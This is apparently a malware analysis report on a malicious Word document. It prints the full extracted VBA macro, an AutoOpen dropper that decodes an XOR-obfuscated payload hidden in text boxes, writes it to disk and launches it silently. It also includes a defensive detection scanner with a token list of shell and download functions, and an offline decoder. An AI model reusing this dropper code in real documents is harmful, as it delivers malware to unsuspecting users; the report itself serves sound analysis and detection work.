Malicious Office (OLE) / .DOCX — malware analysis report

Static analysis result for SHA-256 1174fd03271f80f5…

MALICIOUS

Office (OLE) / .DOCX

Size: 1.94 MB
Created: 2020-09-22 03:08:00
Authoring application: Microsoft Office Word
First seen: 2026-05-13
MD5: 6e815cacb43c9bc055399a4fd4922ebc
SHA-1: fe1894d343484cb3dc7ec16bef8252bd64cb7b6e
SHA-256: 1174fd03271f80f5e2a6435c72bdd0272a6e3a37049f6190abf125b216a83471
Risk score: 108

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1059 Command and Scripting Interpreter
T1105 Ingress Tool Transfer
T1204.002 User Execution: Malicious File

The sample contains VBA macros with an AutoOpen entry point, so the code runs as soon as a user opens the document and enables macros (T1204.002, T1059.005). Nothing in the visible source downloads anything: the payload and its parameters are stored as Base64 text in the document's own shapes, Text Box 3 to Text Box 6. AutoOpen decodes each one through an MSXML2.DOMDocument element with dataType "bin.base64", then applies a per-byte XOR and offset (key 37 with +134-256 for the three strings, key 214 with +55 wrapped at 256 for the binary buffer). It writes the decoded buffer to the path from Text Box 3 with Open/Put, replaces the visible document body with the text of Text Box 2 and saves the file, and finally calls CreateObject on the class name from Text Box 6 and invokes .Run with the command from Text Box 4, window style 0 and no wait, which matches the WScript.Shell.Run signature. The document is therefore a self-contained dropper and launcher for an embedded second-stage component. Note that the OLE_VBA_CREATEOBJ heuristic matched the MSXML2 decoder helper; the CreateObject call that actually executes takes its class name from decoded shape text, so the drop path, command line and COM class are not present in the macro source and must be recovered from the shapes.

Heuristics (4)

  • VBA macros detected [medium, 3 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • CreateObject call [high] OLE_VBA_CREATEOBJ
    Matched line in script:
        Set xmlDoc = CreateObject("MSXML2.DOMDocument")
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it; it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • AutoOpen macro [low] OLE_VBA_AUTOOPEN
    Matched line in script:
        Sub AutoOpen()
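The pairing rule from the OLE_VBA_PCODE_AUTOEXEC_EXEC entry, written out as a small scanner. This is an added example, not the analyzer's own code: the token lists are copied from the description above, the module split on Attribute VB_Name lines assumes olevba-style concatenated source, and the two sample streams are constructed (one reproduces the relevant lines of the macro shown further down this page, the other is a benign auto-exec macro with no execution token that must not fire). The analyzer applies the rule to compiled p-code/cache streams; the same test works on any text you can pull out of such a stream.

```python
import re

# Token lists copied from the OLE_VBA_PCODE_AUTOEXEC_EXEC description.
AUTOEXEC_TOKENS = ("Auto_Open", "AutoOpen", "Document_Open", "Workbook_Open",
                   "Auto_Close", "AutoClose")
EXEC_TOKENS = ("Shell", "CreateObject", "GetObject", "PowerShell", "cmd.exe",
               "URLDownloadToFile", "WinHttp", "XMLHTTP", "ADODB.Stream",
               "ShellExecute", "ExecuteExcel4Macro")

# A token must not be glued to an identifier character on either side, so
# "objShell" or "ShellExecuteEx" do not count as a bare "Shell" hit. Dots
# inside a token ("cmd.exe", "ADODB.Stream") are matched literally.
_IDENT = r"[A-Za-z0-9_]"


def find_tokens(text: str, tokens) -> list:
    """Return the tokens from `tokens` present in `text` (case-insensitive, whole-token)."""
    hits = []
    for tok in tokens:
        pat = r"(?<!" + _IDENT + ")" + re.escape(tok) + r"(?!" + _IDENT + ")"
        if re.search(pat, text, re.IGNORECASE):
            hits.append(tok)
    return hits


def autoexec_exec_pairing(stream_text: str):
    """Apply the pairing rule to one module/stream.

    Returns None unless at least one auto-exec entry point AND at least one
    shell/download/object-execution token occur in the same stream; otherwise
    returns both matched sets (what the finding's detail line would name).
    """
    auto = find_tokens(stream_text, AUTOEXEC_TOKENS)
    execs = find_tokens(stream_text, EXEC_TOKENS)
    if auto and execs:
        return {"autoexec": auto, "exec": execs}
    return None


def split_modules(vba_source: str) -> dict:
    """Split olevba-style concatenated source into modules on Attribute VB_Name lines."""
    modules, name, buf = {}, None, []
    for line in vba_source.splitlines():
        m = re.match(r'\s*Attribute VB_Name = "([^"]+)"', line)
        if m:
            if name is not None:
                modules[name] = "\n".join(buf)
            name, buf = m.group(1), []
        buf.append(line)
    if name is not None:
        modules[name] = "\n".join(buf)
    return modules


def scan(vba_source: str) -> dict:
    """Run the pairing rule per module; only modules that fire are returned."""
    findings = {}
    for name, text in split_modules(vba_source).items():
        hit = autoexec_exec_pairing(text)
        if hit:
            findings[name] = hit
    return findings


# Constructed sample: the lines of this page's macro that matter to the rule.
SAMPLE_SOURCE = '''Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"

Attribute VB_Name = "NewMacros"
Private Function Base64Decode(base64 As String) As Variant
    Set xmlDoc = CreateObject("MSXML2.DOMDocument")
End Function
Sub AutoOpen()
    Set objShell = CreateObject(strObject)
    objShell.Run strArgment, 0, False
End Sub
'''

# Constructed benign sample: auto-exec entry point, no execution token.
SAMPLE_BENIGN_SOURCE = '''Attribute VB_Name = "ThisDocument"
Private Sub Document_Open()
    ActiveDocument.Shapes("Text Box 1").TextFrame.TextRange.Text = Date
End Sub
'''

if __name__ == "__main__":
    print(scan(SAMPLE_SOURCE))         # NewMacros fires: AutoOpen + CreateObject
    print(scan(SAMPLE_BENIGN_SOURCE))  # {}
```

The per-module split matters: an auto-exec stub in ThisDocument and a CreateObject call in an unrelated module is a much weaker signal than both in one stream, which is what the analyzer's rule requires.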

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 2918 bytes
SHA-256: 53eaadad198752eaaf33f8504dd37e174992c8ac25ebe53bf3e471a3ba748521
Script preview (first 1,000 lines of the extracted script)
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "NewMacros"
Private Function Base64Decode(base64 As String) As Variant
    Dim xmlDoc As Object
    Dim xmlNode As Object
    
    Set xmlDoc = CreateObject("MSXML2.DOMDocument")
    Set xmlNode = xmlDoc.createElement("b64")
    
    xmlNode.dataType = "bin.base64"
    xmlNode.Text = base64
    
    Base64Decode = xmlNode.nodeTypedValue

End Function
Private Function GetStringData(data As String) As String
    Dim decData As Variant
    Dim nLen As Long
    Dim strPath As String

    decData = Base64Decode(data)
    nLen = UBound(decData) - LBound(decData) + 1

    strPath = ""
    For inx = 0 To nLen - 1
        strPath = strPath & Chr((decData(inx) Xor 37) + 134 - 256)
    Next inx
    GetStringData = strPath
End Function
Private Function GetBufferData(data As String) As Variant
    Dim decData As Variant
    Dim nLen As Long

    decData = Base64Decode(data)
    nLen = UBound(decData) - LBound(decData) + 1

    For inx = 0 To nLen - 1
     If ((decData(inx) Xor 214) + 55) > 255 Then
        decData(inx) = (decData(inx) Xor 214) + 55 - 256
     Else
        decData(inx) = (decData(inx) Xor 214) + 55
     End If
    Next inx
    GetBufferData = decData
End Function
Sub AutoOpen()
'
' AutoOpen Macro
'
'
Dim strPath As String
Dim strArgment As String
Dim DataBuffer As Variant
Dim PBuffer() As Byte
Dim strObject As String

If ActiveDocument.Shapes.Count < 1 Then Exit Sub

strPath = GetStringData(ActiveDocument.Shapes("Text Box 3").TextFrame.TextRange.Text)
strArgment = GetStringData(ActiveDocument.Shapes("Text Box 4").TextFrame.TextRange.Text)
DataBuffer = GetBufferData(ActiveDocument.Shapes("Text Box 5").TextFrame.TextRange.Text)
nLen = UBound(DataBuffer) - LBound(DataBuffer) + 1
strObject = GetStringData(ActiveDocument.Shapes("Text Box 6").TextFrame.TextRange.Text)
    
    ReDim PBuffer(nLen)
    For inx = 0 To nLen - 1
        PBuffer(inx) = DataBuffer(inx)
    Next inx

    Open strPath For Binary Lock Write As #1
    Put #1, 1, PBuffer
    Close #1
    
    
    ActiveDocument.Shapes("Text Box 2").Select
    Selection.ShapeRange.TextFrame.TextRange.Select
    Selection.Collapse
    Selection.WholeStory
    Selection.Copy
    Selection.ShapeRange.Select
    Selection.MoveUp Unit:=wdScreen, Count:=1
    Selection.WholeStory
    Selection.Delete Unit:=wdCharacter, Count:=1
    Selection.PasteAndFormat (wdFormatOriginalFormatting)
    ActiveDocument.Save
    
    Set objShell = CreateObject(strObject)
    objShell.Run strArgment, 0, False
    Set objShell = Nothing
End Sub
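Recovering what AutoOpen would drop and run, without opening the document: the routines below replicate GetStringData and GetBufferData byte for byte so the shape text can be decoded offline. This is an added example, not the analyzer's or the sample's code. The encode_* helpers exist only to build constructed test input, and the demo values (path, command line, COM class name, payload bytes) are made up; the real ones sit in the document's text boxes and are not reproduced in this report. Reading the text of each shape out of the .docx (the w:txbxContent elements in word/document.xml) is left to your DOCX parser.

```python
import base64

# Parameters copied from the extracted macro.
STRING_XOR_KEY = 37       # GetStringData: Chr((b Xor 37) + 134 - 256)
STRING_OFFSET = 134 - 256
BUFFER_XOR_KEY = 214      # GetBufferData: ((b Xor 214) + 55), wrapped at 256
BUFFER_OFFSET = 55

# Text-box roles exactly as AutoOpen assigns them.
SHAPE_ROLES = {"Text Box 3": "drop_path", "Text Box 4": "run_command",
               "Text Box 5": "payload", "Text Box 6": "com_object"}


def decode_string(b64_text: str) -> str:
    """GetStringData: Base64-decode, then per byte Chr((b Xor 37) + 134 - 256).

    The macro never wraps this value, so a byte whose result leaves 0..255
    would make Chr() fail; such input was not produced by the encoder and is
    reported instead of being masked.
    """
    out = []
    for b in base64.b64decode(b64_text):
        v = (b ^ STRING_XOR_KEY) + STRING_OFFSET
        if not 0 <= v <= 255:
            raise ValueError(f"byte {b:#04x} decodes to {v}, outside 0..255")
        out.append(chr(v))
    return "".join(out)


def decode_buffer(b64_text: str) -> bytes:
    """GetBufferData: Base64-decode, then per byte ((b Xor 214) + 55) mod 256."""
    return bytes(((b ^ BUFFER_XOR_KEY) + BUFFER_OFFSET) & 0xFF
                 for b in base64.b64decode(b64_text))


def dropped_file_bytes(b64_text: str) -> bytes:
    """What AutoOpen writes to strPath: ReDim PBuffer(nLen) allocates nLen+1
    elements (indices 0..nLen) and Put writes the whole array, so the file on
    disk is the decoded payload followed by one 0x00 byte."""
    return decode_buffer(b64_text) + b"\x00"


def recover_dropper(shape_text: dict) -> dict:
    """Decode each shape according to the role AutoOpen gives it.
    `shape_text` is {shape name: shape text}, as read from the document."""
    result = {}
    for shape, role in SHAPE_ROLES.items():
        text = shape_text[shape]
        result[role] = decode_buffer(text) if role == "payload" else decode_string(text)
    return result


# Inverses of the two decoders; used here only to construct test input.
def encode_string(text: str) -> str:
    return base64.b64encode(bytes((ord(c) - STRING_OFFSET) ^ STRING_XOR_KEY
                                  for c in text)).decode()


def encode_buffer(payload: bytes) -> str:
    return base64.b64encode(bytes(((b - BUFFER_OFFSET) & 0xFF) ^ BUFFER_XOR_KEY
                                  for b in payload)).decode()


# Constructed demo values (NOT recovered from the sample). "WScript.Shell" is
# an assumption that matches the .Run(command, 0, False) call in the macro.
DEMO_SHAPES = {
    "Text Box 3": encode_string(r"C:\Users\Public\update.exe"),
    "Text Box 4": encode_string(r"C:\Users\Public\update.exe /silent"),
    "Text Box 5": encode_buffer(b"MZ\x90\x00" + bytes(range(16))),
    "Text Box 6": encode_string("WScript.Shell"),
}

if __name__ == "__main__":
    for role, value in recover_dropper(DEMO_SHAPES).items():
        print(f"{role:12} {value!r}")
```

Feed recover_dropper the real shape text and you get the drop path, the command line and the COM class without ever letting the macro run; hash the decode_buffer output (or dropped_file_bytes, if you are matching what lands on disk) to pivot to the second stage.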